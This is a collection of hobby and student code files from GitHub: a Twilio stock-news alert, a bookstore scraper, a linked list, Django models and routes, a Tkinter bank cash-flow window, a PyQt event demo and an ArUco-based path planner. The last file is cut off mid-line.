+{"seq_id":"11745896576","text":"import requests\nimport os\nfrom twilio.rest import Client\n\nSTOCK_NAME = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\n\nSTOCK_ENDPOINT = \"https://www.alphavantage.co/query\"\nNEWS_ENDPOINT = \"https://newsapi.org/v2/everything\"\n\nSTOCK_API_KEY = \"YOUR-STOCK-API-KEY\"\nNEWS_API_KEY = \"YOUR-NEWS-API-KEY\"\n\naccount_sid = \"YOUR-ACCOUNT-SIDE\"\nauth_token = \"YOUR-AUTH-TOKEN\"\n\n\nSTOCK_PARAMETERS = {\n \"function\": \"TIME_SERIES_DAILY\",\n \"symbol\": STOCK_NAME,\n \"apikey\": STOCK_API_KEY\n}\n\nstock_response = requests.get(STOCK_ENDPOINT, params=STOCK_PARAMETERS)\nstock_data = stock_response.json()[\"Time Series (Daily)\"]\ndata_list = [value for (key, value) in stock_data.items()]\n\nstock_yday = float(data_list[0][\"4. close\"])\nstock_dbyday = float(data_list[1][\"4. close\"])\n\ndifference = abs(stock_yday - stock_dbyday)\npercentage_difference = round(difference / stock_dbyday * 100, 2)\n\ndef diference_direction():\n if stock_dbyday > stock_yday:\n return \"📉\"\n elif stock_dbyday < stock_yday:\n return \"📈\"\n\nif percentage_difference >= 5:\n NEWS_PARAMETERS = {\n \"apiKey\": NEWS_API_KEY,\n \"q\": \"Tesla\",\n \"sortBy\": \"publishedAt\"\n }\n\n news_response = requests.get(url=NEWS_ENDPOINT, params=NEWS_PARAMETERS)\n news_data = news_response.json()[\"articles\"]\n\n top_3 = news_data[:3]\n\n title_1 = top_3[0][\"title\"]\n description_1 = top_3[0][\"description\"]\n title_2 = top_3[1][\"title\"]\n description_2 = top_3[1][\"description\"]\n title_3 = top_3[2][\"title\"]\n description_3 = top_3[2][\"description\"]\n news_list = [(title_1, description_1), (title_2, description_2), (title_3, description_3)]\n\n\n def diference_direction():\n if stock_dbyday > stock_yday:\n return \"📉\"\n elif stock_dbyday < stock_yday:\n return \"📈\"\n\n\n for num in range(0, 3):\n client = Client(account_sid, auth_token)\n message = client.messages \\\n .create(\n body= f\"TSLA: {diference_direction()}{percentage_difference}% \"\n f\"Headline: {news_list[num][0]} \"\n f\"Brief: {news_list[num][1]}\",\n from_=\"+19895026250\",\n to=\"+34692448752\"\n )\n print(message.status)\n\n\n","repo_name":"BigEd12/Project_36","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39729746063","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport csv\nimport re\nimport string\nimport pandas as pd\n\n\nclass FastBookScraper():\n \"\"\"\n A class that scrapes the website todostuslibros.com/mas_vendidos faster \\\n but with less information than BookScraper.\n\n Attributes:\n This class does not have public attributes\n\n Methods:\n scrape(): Scrapes the website\n data2csv(output_file): Creates and stores collected data into a csv \\\n in the given file path.\n download_covers(input_file, output_folder): Downloads and stores book \\\n covers.\n \"\"\"\n _url = \"https://www.todostuslibros.com/mas_vendidos\"\n _id = 0\n _dt = []\n _headers = {\n \"Accept\": \"text/html,application/xhtml+xml,\\\n application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate, sdch, br\",\n \"Accept-Language\": \"en-US,en;q=0.8\",\n \"Cache-Control\": \"no-cache\",\n \"dnt\": \"1\",\n \"Pragma\": \"no-cache\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) \\\n AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 \\\n Safari/537.36\"\n }\n\n def __init__(self):\n pass\n\n @classmethod\n def _generate_unique_id(cls, value):\n \"\"\"\n Sums value to class variable _id.\n\n Parameters:\n value (int): The value of the last id\n \"\"\"\n cls._id += value\n\n def _get_html(self, url):\n \"\"\"\n Gets an html from a url given.\n\n Parameters:\n url (string): The url of the website the html is extracted\n\n Returns:\n The html from the url given\n \"\"\"\n return requests.get(url, headers=self._headers)\n\n def _get_pages_links(self, soup):\n \"\"\"\n Gets pages links from an html given.\n\n Parameters:\n soup (object 'bs4.BeautifulSoup'): An html object of the \\\n first group of books.\n\n Returns:\n pages_urls (list): A list of the different url from all the \\\n pages where are books.\n \"\"\"\n pages_urls = []\n page_items = soup.findAll('a', attrs={'class': 'page-link'})\n # Deleting last item corresponding to the (next_page button)\n page_items.pop()\n\n # Obtaining last page\n last_p = page_items.pop()\n max_p = int(last_p.contents[0])\n\n # Obtaining link\n full_link = last_p.attrs['href']\n link = full_link.rstrip(string.digits)\n\n for i in range(1, max_p + 1):\n # Obtaining list of links for all the pages\n pages_urls.append(link + str(i))\n\n return pages_urls\n\n def _get_title(self, book):\n \"\"\"\n Extracts the book title.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n Returns:\n title (string): The title of the book given\n \"\"\"\n title = book.find(class_=\"title\").contents[1].contents[0]\n return title.strip()\n\n def _get_subtitle(self, book):\n \"\"\"\n Extracts the book subtitle.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a book \\\n in html\n\n Returns:\n subtitle (string): The subtitle of the book given\n \"\"\"\n # There might be no subtitles\n try:\n subtitle = book.find(class_=\"subtitle\").contents[0].contents[0]\n\n except IndexError:\n subtitle = \"\"\n\n return subtitle.strip()\n\n def _get_author(self, book):\n \"\"\"\n Extracts the book author.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n Returns:\n author (string): The author of the book given\n \"\"\"\n autor = book.find(class_=\"author\").contents[0].contents[0]\n return autor.strip()\n\n def _get_editorial_and_ISBN(self, book):\n \"\"\"\n Extracts the book editorial and ISBN.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n Returns:\n ed_isbn (list): The editorial and ISBN of the book\n \"\"\"\n ed_isbn = book.find(class_=\"data\").contents[0].split(\"/\")\n # Deleting all unwanted whitespcaes\n return [s.strip() for s in ed_isbn]\n\n def _get_price(self, book):\n \"\"\"\n Extracts the book price.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n Returns:\n price (list): The price of the book given\n \"\"\"\n price = book.find(class_=\"book-price\").contents[1].contents[0]\n # Digits are extracted from the string\n return re.findall(r'\\d+\\.\\d+|\\d+', price)[0]\n\n def _get_price_no_taxes(self, book):\n \"\"\"\n Extracts the book price without taxes.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n Returns:\n untaxed price (list): The price without taxes of the book given\n \"\"\"\n untaxed = book.find(class_=\"book-price\").contents[2]\n # Digits are extracted from the string\n return re.findall(r'\\d+\\.\\d+|\\d+', untaxed)[0]\n\n def _get_book_image(self, book):\n \"\"\"\n Extracts the book cover.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n Returns:\n cover (string): The url of the cover's picture\n \"\"\"\n # TODO: Representa que con extraer el link es suficiente?\n img = book.find(class_=\"book-image col-3 col-sm-3 col-md-2\")\n return img.a.img['src']\n\n def _get_books(self, soup):\n \"\"\"\n Extracts the information from all books and appends them to the object.\n\n Parameters:\n soup (object 'bs4.BeautifulSoup'): An html of a page of different \\\n books given\n \"\"\"\n book_info = dict()\n books = soup.find_all(class_=\"book row\")\n\n for book in books:\n self._generate_unique_id(1)\n book_info = {\"id\": self._id,\n \"title\": self._get_title(book),\n \"subtitle\": self._get_subtitle(book),\n \"author\": self._get_author(book),\n \"editorial\": self._get_editorial_and_ISBN(book)[0],\n \"ISBN\": self._get_editorial_and_ISBN(book)[1],\n \"price (€)\": self._get_price(book),\n \"untaxed price (€)\": self._get_price_no_taxes(book),\n \"book cover\": self._get_book_image(book)\n }\n\n self._dt.append(book_info)\n\n def scrape(self):\n \"\"\"\n Scrapes the website.\n \"\"\"\n print(\"Web Scraping of books data from {} \".format(self._url) +\n \"This process could take about 2 minutes.\\n\")\n\n # Start timer\n start_time = time.time()\n\n # Get main page\n html_page = self._get_html(self._url)\n soup = BeautifulSoup(html_page.content, features=\"html.parser\")\n\n # Loop through all pages and get their relevant content\n for page in self._get_pages_links(soup):\n\n html_page = self._get_html(page)\n soup = BeautifulSoup(html_page.content, features=\"html.parser\")\n self._get_books(soup)\n\n def data2csv(self, output_file):\n \"\"\"\n Turns the data into a csv file to the path given.\n\n Parameters:\n output_file (string): File path for the output.\n \"\"\"\n with open(output_file, 'w', encoding='utf-8') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=self._dt[0].keys())\n writer.writeheader()\n writer.writerows(self._dt)\n\n def download_covers(self, input_filepath, output_folder):\n \"\"\"\n Downloads and stores book covers images giving them their book \\\n id as filename.\n\n Parameters:\n input_filepath (string): Filepath to scraped csv.\n output_folder (string): Path to the folder where \\\n images will be stored.\n \"\"\"\n df = pd.read_csv(input_filepath, usecols=['id', 'book cover'])\n for i in df.index:\n html = self._get_html(df[\"book cover\"][i])\n if html.status_code == 200:\n output = open(output_folder + '/' + str(df[\"id\"][i]) +\n '.gif', \"wb\")\n\n for chunk in html:\n output.write(chunk)\n\n output.close()\n","repo_name":"MartaCollPol/WebScraping","sub_path":"src/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":9237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35958043263","text":"class Nodo:\n def __init__(self, dato):\n self.dato = dato\n self.siguiente = None\n self.anterior = None\n\nclass ListaDoble:\n def __init__(self):\n self.head = None\n self.end = None\n\n def añadirNodoPrincipio(self, dato):\n nuevoNodo = Nodo(dato)\n\n #Validamos si la lista esta vacia\n if self.head == None:\n print(\"Ingresando nodo con lista vacia\")\n self.head = nuevoNodo\n self.end = nuevoNodo\n \n #Si por lo menos hay un nodo, insertamos al inicio\n else:\n print(\"Insertando nodo al principio\")\n self.head.anterior = nuevoNodo\n nuevoNodo.siguiente = self.head\n self.head = nuevoNodo\n\n def añadirNodoFinal(self, dato):\n nuevoNodo = Nodo(dato)\n\n #insertamos si la lista esta vacia\n if self.head == None:\n print(\"Ingresando nodo con lista vacia\")\n self.head = nuevoNodo\n self.end = nuevoNodo\n\n #si por lo menos hay un nodo, insertamos al final\n else:\n print(\"Insertando nodo al final\")\n self.end.siguiente = nuevoNodo\n nuevoNodo.anterior = self.end\n self.end = nuevoNodo\n\n\n def imprimirLista(self):\n print(\"*** Imprimiendo lista ***\")\n nodoTemporal = Nodo(\"\")\n\n nodoTemporal = self.head\n contador = 0\n while nodoTemporal != None:\n contador += 1\n print(\"Nodo:\"+str(contador)+\" -> \"+nodoTemporal.dato)\n nodoTemporal = nodoTemporal.siguiente\n\n print(\"*** Lista Terminada ***\")\n\n def borrarNodo(self, dato):\n #creamos un nodo temporal\n nodoTemporal = Nodo(\"\")\n\n #el temporal empieza en la cabeza\n nodoTemporal = self.head\n\n #Mientras que el temporal no sea nulo\n while nodoTemporal != None:\n\n #validamos si ese nodo es el que busco\n if nodoTemporal.dato == dato:\n\n #Si ese nodo es la cabeza\n if nodoTemporal == self.head:\n print(\"Borrando dato en la cabeza\")\n self.head = self.head.siguiente\n nodoTemporal.siguiente = None\n self.head.anterior = None\n #Si ese nodo es la cola\n elif nodoTemporal == self.end:\n print(\"Borrando dato en la cola\")\n self.end = self.end.anterior\n nodoTemporal.anterior = None\n self.end.siguiente = None\n #Si no es ni la cola ni la cabeza\n else:\n print(\"Borrando dato del medio\")\n nodoTemporal.anterior.siguiente = nodoTemporal.siguiente\n nodoTemporal.siguiente.anterior = nodoTemporal.anterior\n nodoTemporal.siguiente = nodoTemporal.anterior = None\n\n nodoTemporal = nodoTemporal.siguiente\n\n\n\n\n ","repo_name":"ViannJu/IPC2_Ejemplos_2","sub_path":"Lista DobleEnlazada/Estructuras.py","file_name":"Estructuras.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19915278630","text":"#rationalmap/models.py\n\nfrom django.db import models \n\nclass User(models.Model): \n \n user_id = models.AutoField(primary_key=True)\n \n #user_name includes first and last names\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=40)\n \n #email recovered from credentials' extraction external method\n email = models.EmailField()\n \n EMAIL_TYPE_CHOICES = (\n ('gmail', 'Gmail'),\n ('hotmail', 'Hotmail'),\n ('other', 'Other')\n )\n\n email_type = models.CharField(max_length=7,choices=EMAIL_TYPE_CHOICES)\n \n EMAIL_USE_CHOICES = (\n (1, 'Personal'),\n (2, 'Freelance'),\n (3, 'Enterprise'),\n )\n \n email_use = models.IntegerField(choices=EMAIL_USE_CHOICES)\n\n LANGUAGE_CHOICES = (\n ('es', 'Spanish'),\n ('en', 'English'),\n )\n \n pref_language = models.CharField(max_length=2,choices=LANGUAGE_CHOICES,default='en')\n \n TIMEZONE_CHOICES = (\n ('-12', 'GMT -12:00 Eniwetok, Kwajalein'),\n ('-11.0', 'GMT -11:00 Midway Island, Samoa'),\n ('-10.0', 'GMT -10:00 Hawaii'),\n ('-9.0', 'GMT -9:00 Alaska'),\n ('-8.0', 'GMT -8:00 Pacific Time (US & Canada)'),\n ('-7.0', 'GMT -7:00 Mountain Time (US & Canada)'),\n ('-6.0', 'GMT -6:00 Central Time (US & Canada, Mexico City'),\n ('-5.0', 'GMT -5:00 Eastern Time (US & Canada), Bogota, Lima'),\n ('-4.0', 'GMT -4:00 Atlantic Time (Canada), Caracas, La Paz'),\n ('-3.5', 'GMT -3:30 Newfoundland'),\n ('-3.0', 'GMT -3:00 Brazil, Buenos Aires, Georgetown'),\n ('-2.0', 'GMT -2:00 Mid-Atlantic'),\n ('-1.0', 'GMT -1:00 hour Azores, Cape Verde Islands'),\n ('0.0', 'GMT Western Europe Time, London, Lisbon, Casablanca'),\n ('1.0', 'GMT +1:00 Brussels, Copenhagen, Madrid, Paris'),\n ('2.0', 'GMT +2:00 Kaliningrad, South Africa'),\n ('3.0', 'GMT +3:00 Baghdad, Riyadh, Moscow, St. Petersburg'),\n ('3.5', 'GMT +3:30 Tehran'),\n ('4.0', 'GMT +4:00 Abu Dhabi, Muscat, Baku, Tbilisi'),\n ('4.5', 'GMT +4:30 Kabul'),\n ('5.0', 'GMT +5:00 Ekaterinburg, Islamabad, Karachi, Tashkent'),\n ('5.5', 'GMT +5:30 Bombay, Calcutta, Madras, New Delhi'),\n ('5.75', 'GMT +5:45 Kathmandu'),\n ('6.0', 'GMT +6:00 Almaty, Dhaka, Colombo'),\n ('7.0', 'GMT +7:00 Bangkok, Hanoi, Jakarta'),\n ('8.0', 'GMT +8:00 Beijing, Perth, Singapore, Hong Kong'),\n ('9.0', 'GMT +9:00 Tokyo, Seoul, Osaka, Sapporo, Yakutsk'),\n ('9.5', 'GMT +9:30 Adelaide, Darwin'),\n ('10.0', 'GMT +10:00 Eastern Australia, Guam, Vladivostok'),\n ('11.0', 'GMT +11:00 Magadan, Solomon Islands, New Caledonia'),\n ('12.0', 'GMT +12:00 Auckland, Wellington, Fiji, Kamchatka'),\n )\n \n timezone = models.CharField(max_length=5,choices=TIMEZONE_CHOICES,default='GMT')\n \n #class User methods:\n \n def __str__(self):\n return \"Usuario \" + self.first_name + \" \" + self.last_name + \" dado de alta\"\n\n def get_absolute_url(self):\n #Returns the url to access a particular instance of the model\n return reverse('model-detail-view', args=[str(self.id)])\n \n def get_name(self):\n return self.firt_name + ' ' + self.last_name\n \n \nclass Company(models.Model):\n \n company_id=models.AutoField(primary_key=True)\n company_name = models.CharField(max_length=100)\n \n #class Company methods:\n \n def __str__(self):\n return \"Empresa \" + self.company_name + \" dada de alta\"\n \n def get_absolute_url(self):\n #Returns the url to access a particular instance of the model\n return reverse('model-detail-view', args=[str(self.id)])\n \n \nclass Employee(models.Model):\n \n company_id = models.ForeignKey('Company')\n user_id = models.ForeignKey('User')\n \n department = models.CharField(max_length=40)\n \n PROFILE_CHOICES = (\n (1, 'CEO'),\n (2, 'Senior Manager'),\n (3, 'Sales'),\n (4, 'Administrations, Financial, Operations'),\n (5, 'Marketing & PR'),\n (6, 'Consulting, Projet Management'),\n (7, 'Customer Care'),\n (8, 'Engineering, Systems, R&D'),\n (9, 'Training'),\n )\n \n profile = models.IntegerField(choices=PROFILE_CHOICES)\n \n WORKINGTIME_CHOICES = (\n (1, 'Fulltime'),\n (2, 'Partime'),\n )\n \n working_time = models.IntegerField(choices=WORKINGTIME_CHOICES,default=1)\n \n #class Employee methods:\n \n def __str__(self):\n return str(self.user_id) + \" \" + str(self.company_id)\n\n def get_absolute_url(self):\n #Returns the url to access a particular instance of the model\n return reverse('model-detail-view', args=[str(self.id)])\n \n #def dept_manager(company_id, department):\n ","repo_name":"JuandeGA/rationalmap","sub_path":"register/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71553015147","text":"from tkinter import *\r\nfrom datetime import date\r\nimport datetime\r\nfrom PIL import Image,ImageTk\r\nfrom tkinter import messagebox\r\nimport mysql.connector\r\nmycon=mysql.connector.connect(host=\"localhost\", user=\"root\", passwd=\"root\", database=\"bank\")\r\nmycon.autocommit=True\r\ncursor=mycon.cursor()\r\n\r\nclass check_cash_flow():\r\n def __init__(self,root):\r\n self.root=root\r\n self.root.title(\"IBBI BANK\")\r\n self.root.geometry(\"700x500\")\r\n\r\n #---------------------------------------------------------title----------------------------------------------------------------------------------------------\r\n lbl_title=Label(self.root,text=\"Today's Cash Flow\",font=(\"times new roman\",15,\"bold\"),bg=\"black\",fg=\"gold\",bd=4,relief=RIDGE)\r\n lbl_title.place(x=0,y=0,width=700,height=50)\r\n\r\n img2=Image.open(r\"G:\\My Drive\\PROJECT BANK\\logo.png\")\r\n img2=img2.resize((120,45),Image.Resampling.LANCZOS)\r\n self.photoimg2=ImageTk.PhotoImage(img2)\r\n \r\n lblimg=Label(self.root,image=self.photoimg2,bd=0,relief=RIDGE)\r\n lblimg.place(x=5,y=2,width=100,height=40)\r\n\r\n def getValue():\r\n d=date.today()\r\n print(\"Cash Flow on:\",d)\r\n\r\n \r\n \r\n s=\"select sum(amount) from withdrawal where date_of_withdrawal='{}' \".format(d)\r\n cursor.execute(s)\r\n row=cursor.fetchone()\r\n if row[0]==None:\r\n withdrawal=0.00\r\n else:\r\n withdrawal=row[0]\r\n print(\"withdrawal:\",withdrawal)\r\n withdrawal=str(withdrawal)\r\n \r\n\r\n \r\n s=\"select sum(amount) from deposit where date_of_deposit='{}' \".format(d)\r\n cursor.execute(s)\r\n row=cursor.fetchone()\r\n if row[0]==None:\r\n deposit=0.00\r\n else:\r\n deposit=row[0]\r\n print(\"deposit\",deposit)\r\n \r\n \r\n print(\"balance remaining in bank:\", float(deposit)-float(withdrawal))\r\n rem_bal=float(deposit)-float(withdrawal)\r\n\r\n deposit=float(deposit)\r\n\r\n withdrawal=float(withdrawal)\r\n\r\n sensor_value=\"Cash Flow on: \"+str(d)\r\n p=sensor_value\r\n sensor_value=\"Deposit: \"+str(\"%10.2f\"%deposit)\r\n x=sensor_value\r\n sensor_value=\"Withdrawal: \"+str(\"%10.2f\"%withdrawal)\r\n y=sensor_value\r\n sensor_value=\"Remainig Balance: \"+str(\"%10.2f\"%rem_bal)\r\n z=sensor_value\r\n\r\n text=Label(root,text=p,font=(\"times new roman\",25,\"bold\"),fg=\"black\",relief=RIDGE)\r\n text.place(x=90,y=150)\r\n text=Label(root,text=x,font=(\"times new roman\",25,\"bold\"),bg=\"black\",fg=\"gold\",relief=RIDGE)\r\n text.place(x=90,y=200)\r\n text=Label(root,text=y,font=(\"times new roman\",25,\"bold\"),bg=\"black\",fg=\"gold\",relief=RIDGE)\r\n text.place(x=90,y=250)\r\n text=Label(root,text=z,font=(\"times new roman\",25,\"bold\"),bg=\"black\",fg=\"gold\",relief=RIDGE)\r\n text.place(x=90,y=300)\r\n\r\n \r\n \r\n\r\n \r\n getValue()\r\n def close_win():\r\n\r\n root.destroy()\r\n\r\n \r\n \r\n btn=Button (self.root,text=\"Close\",padx=2,pady=6,command=close_win)\r\n btn.pack(side='bottom')\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\nif __name__==\"__main__\":\r\n root=Tk()\r\n obj=check_cash_flow(root)\r\n root.mainloop()\r\n\r\n","repo_name":"Sairindhrii/Banking-System","sub_path":"cash_flow_graphics.py","file_name":"cash_flow_graphics.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41896807468","text":"import sys\n\nfrom PyQt5.QtCore import Qt, QSize\nfrom PyQt5.QtWidgets import QApplication, QLabel, QMainWindow, QTextEdit\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__() # The class will have it's all properties and methods. Not reinitializing them. The properties and methods with same name will get replaced\n self.setWindowTitle(\"Event Handling Example\")\n self.setMinimumSize(QSize(500, 400))\n\n self.label = QLabel(\"Click This window\")\n self.setCentralWidget(self.label)\n # self.setMouseTracking(True)\n\n def mousePressEvent(self, e):\n\n if e.button() == Qt.LeftButton:\n # handle the left-button press in here\n self.label.setText(\"mousePressEvent LEFT\")\n\n elif e.button() == Qt.MiddleButton:\n # handle the middle-button press in here.\n self.label.setText(\"mousePressEvent MIDDLE\")\n\n elif e.button() == Qt.RightButton:\n # handle the right-button press in here.\n self.label.setText(\"mousePressEvent RIGHT\")\n\n def mouseReleaseEvent(self, e):\n if e.button() == Qt.LeftButton:\n self.label.setText(\"mouseReleaseEvent LEFT\")\n\n elif e.button() == Qt.MiddleButton:\n self.label.setText(\"mouseReleaseEvent MIDDLE\")\n\n elif e.button() == Qt.RightButton:\n self.label.setText(\"mouseReleaseEvent RIGHT\")\n\n def mouseDoubleClickEvent(self, e):\n if e.button() == Qt.LeftButton:\n self.label.setText(\"mouseDoubleClickEvent LEFT\")\n\n elif e.button() == Qt.MiddleButton:\n self.label.setText(\"mouseDoubleClickEvent MIDDLE\")\n\n elif e.button() == Qt.RightButton:\n self.label.setText(\"mouseDoubleClickEvent RIGHT\")\n\n\napp = QApplication(sys.argv)\nwindow = MainWindow()\nwindow.show()\napp.exec_()\n","repo_name":"abrar-nazib/cortex","sub_path":"tests/event_example.py","file_name":"event_example.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"20475019367","text":"import cv2\nimport time\nimport math\nimport json\nimport numpy as np\nfrom heapq import heappush, heappop\nimport cv2.aruco as aruco\n\ndef init_graph(graph,height,width):\n for i in range(width):\n for j in range(height):\n graph[(i,j)] = {'visited':False, 'distance':np.inf, 'valid':True, 'parent': (0, 0), 'id':'blank'}\n\n return graph\n\ndef render_graph(graph,pt1,pt2):\n clearance = 20\n radius = 20\n for i in range(pt1[0],pt2[0]+1):\n for j in range(pt2[1],pt1[1]+1):\n graph[(i,j)]['valid'] = False\n graph[(i,j)]['id'] = 'obs'\n for i in range(pt1[0]-clearance,pt2[0]+1+clearance):\n for j in range(pt2[1]-clearance,pt1[1]+1+clearance):\n if graph[(i,j)]['id'] != 'obs':\n graph[(i,j)]['valid'] = False\n graph[(i,j)]['id'] = 'aug'\n\n return graph\n\ndef aruco_detect_inductpoint(frame):\n\n inductzone = {}\n parameters = cv2.aruco.DetectorParameters_create()\n # Detect the Induct Point markers in the image\n dictionary = cv2.aruco.Dictionary_get(cv2.aruco.DICT_6X6_250)\n\n markerCorners, markerIds, rejectedCandidates = cv2.aruco.detectMarkers(frame, dictionary, parameters=parameters)\n frame = aruco.drawDetectedMarkers(frame, markerCorners)\n inductzone = extract_induct_point(markerIds, markerCorners)\n\n # print(\"Induct Zone Aruco Markers Detected\")\n # print(inductzone)\n\n return frame, inductzone\n\n# Function to Extract Induct Points\ndef extract_induct_point(ids, bbox):\n \"\"\"\n Extract the induct points from the list and convert\n it to dictionary and returns it.\n \"\"\"\n l_ind = 0\n temp_ls, dest_ls = [], []\n\n for i in ids:\n name = int(i)\n cen_x = int((bbox[l_ind][0][0][0] + bbox[l_ind][0][2][0])/2)\n cen_y = int((bbox[l_ind][0][0][1] + bbox[l_ind][0][2][1])/2)\n ctp = (cen_x-60, cen_y)\n temp_ls.append(ctp)\n dest_ls.append(name)\n l_ind += 1\n\n dest = dict(zip(dest_ls, temp_ls))\n\n return dest\n\ndef get_destination(frame, graph):\n parameters = cv2.aruco.DetectorParameters_create()\n # Detect the markers in the image\n dictionary = cv2.aruco.Dictionary_get(cv2.aruco.DICT_5X5_250)\n markerCorners, markerIds, rejectedCandidates = cv2.aruco.detectMarkers(frame, dictionary, parameters=parameters)\n\n frame = aruco.drawDetectedMarkers(frame, markerCorners)\n\n ind = 0\n ids_ls, cor_ls = [], []\n dic = {}\n\n for i in markerIds:\n ids_ls.append(markerIds[ind][0])\n t = markerCorners[ind].tolist()\n cor_ls.append(t[0])\n ind += 1\n\n temp_ls, sum_ls = [], []\n for k in range(1, 10):\n try:\n indices = [i for i, x in enumerate(ids_ls) if x == k]\n # .append()\n for l in indices:\n sum_ls = sum_ls + cor_ls[l]\n # temp_ls.append(cor_ls[l])\n temp_ls.append(sum_ls)\n sum_ls = []\n except:\n pass\n\n pts_ls = []\n for i in range(0,9):\n try:\n x1 = int((temp_ls[i][0][0] + temp_ls[i][2][0])/2)\n y1 = int((temp_ls[i][0][1] + temp_ls[i][2][1])/2)\n x2 = int((temp_ls[i][4][0] + temp_ls[i][6][0])/2)\n y2 = int((temp_ls[i][4][1] + temp_ls[i][6][1])/2)\n \n if( y1= goal[0] and current[1] <= goal[1]+5 and current[1] >= goal[1] :\n #print(\"Goal reached\")\n (goal_x,goal_y)=(current[0],current[1])\n if row:\n x,y = zip(*row)\n break\n for i in [-3, 0, 3]:\n for j in [-3, 0, 3]:\n if i != 0 or j != 0:\n neighbour = (abs(current[0]+i), abs(current[1]+j))\n lst = list(neighbour)\n if lst[0] >=1280:\n lst[0] = 1279\n if lst[1] >=720:\n lst[1] = 719\n neighbour = tuple(lst)\n if temp[neighbour]['valid'] == True:\n\n if abs(i)+abs(j) == 2:\n distance = math.sqrt(2)\n else:\n distance = 1\n\n if temp[neighbour]['visited'] == False:\n temp[neighbour]['visited'] = True\n row.append([abs(current[0]+i), abs(current[1]+j)])\n x,y = zip(*row)\n\n num_nodes_visited += 1\n temp[neighbour]['parent'] = current\n temp[neighbour]['distance'] = temp[current]['distance'] + distance\n queue_distance = calculate_distance(goal, neighbour)+temp[neighbour]['distance']\n heappush(queue, (queue_distance, neighbour))\n path = [(goal_x, goal_y)]\n parent = (goal_x, goal_y)\n while parent != source:\n parent = temp[path[len(path)-1]]['parent']\n path.append(parent)\n min_distance = (temp[(goal_x,goal_y)]['distance'])\n # print(\"Total Number of Nodes Visited:\", num_nodes_visited)\n \n return(min_distance, path)\n\ndef calculate_distance(goal, current):\n d = math.sqrt(((goal[0]-current[0])*(goal[0]-current[0]))+((goal[1]-current[1])*(goal[1]-current[1])))\n return d\n\nplace = ['Mumbai', 'Delhi', 'Kolkata', \n 'Chennai', 'Bengaluru', 'Hyderabad', \n 'Pune', 'Ahemdabad', 'Jaipur']\ntemp1, temp2 = [], []\nind1, count = 0, 0\ndestination = {}\ngraph = {}\n\nframe = cv2.imread(\"images/img.png\")\n# frame = cv2.imread(\"test.jpg\")\n# frame = cv2.resize(frame, (640, 360))\n\ngraph = init_graph(graph,720,1280)\n\nframe, destination = get_destination(frame, graph)\nframe, inductzone = aruco_detect_inductpoint(frame)\n# ins = json.dumps(destination)\n# print(ins)\n# des = {'bot1': (1024, 431)}\n# ins = json.dumps(des)\n# print(ins)\nprint(destination)\n# destination.update(des)\n# print(destination)\n# print(graph)\nprint(destination['Mumbai'][0])\nprint(inductzone[1][0])\nstart = inductzone[1]\ngoal = closest_point(destination['Hyderabad'], start)\npath, angle = path_plan(graph, start, goal)\nframe = mark_points(frame, start, goal, path)\nprint(path)\nprint(angle)\n\n# start = inductzone[2]\n# goal = closest_point(destination['Delhi'], start)\n# path, angle = path_plan(graph, start, goal)\n# frame = mark_points(frame, start, goal, path)\n# print(path)\n# print(angle)\n\n# start = inductzone[1]\n# for i in destination:\n# goal = closest_point(destination[i], start)\n# print(i, start, goal)\n# path, angle = path_plan(graph, start, goal)\n# frame = mark_points(frame, start, goal, path)\n# print(path)\n# print(angle)\n\n# start = inductzone[2]\n# for i in destination:\n# goal = closest_point(destination[i], start)\n# print(i, start, goal)\n# path, angle = path_plan(graph, start, goal)\n# frame = mark_points(frame, start, goal, path)\n# print(path)\n# print(angle)\n\ncv2.imshow(\"frame\", frame)\ncv2.waitKey()","repo_name":"hari-vickey/The-Eagle-Eye","sub_path":"test_programs/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":11974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32204651293","text":"from django.urls import path\nfrom django.contrib.auth.views import LogoutView\nfrom django.contrib.auth import views as auth_views\nfrom . import views\n\napp_name = 'accaunt'\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='homepage'),\n path('sign_in/', views.UserLoginView.as_view(), name='sign_in'),\n path('sign_up/', views.UserRegisterView.as_view(), name='sign_up'),\n path('logout/', LogoutView.as_view(next_page=\"/sign_in/\"), name='logout'),\n path('settings/', views.UserSettingView.as_view(), name='settings'),\n path('profiles/', views.ListUserView.as_view(), name='profiles'),\n path('follow/', views.user_follow, name='user_follow'),\n path('user_detail//', 